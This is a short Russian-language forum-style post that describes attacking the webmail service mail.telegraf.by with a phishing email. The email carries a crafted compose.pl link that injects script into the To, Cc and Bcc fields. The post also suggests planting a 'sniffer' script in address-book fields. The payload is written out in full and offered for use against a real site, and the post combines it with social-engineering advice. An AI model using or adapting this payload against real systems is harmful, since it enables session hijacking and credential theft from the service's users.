Юзаем свои неисчерпаемые навыки соц. инженерии. Пишем в виде хтмл письмо с содержанием типа: ...бла-бла-бла... НАпиши мне! написать по-быстрому мона тут: < a href='http://mail.telegraf.by/compose.pl?func=new&To=[_наше мыло_]"><script>alert("xaxa")</script><input type="text&Cc=[">XSS]&Bcc=[">XSS]&back=abook.pl&f=open'>ТУТ!</a> откроется страничка в которой в поле для КОМУ будет наше мыло. А тем временем вылетит алерт =) (ха, а алерт ли нам нужен? ) Ещё заходим в адресную книгу и там заполняем поля фамилия, имя, мыло любимым скриптом для вставки сниффера
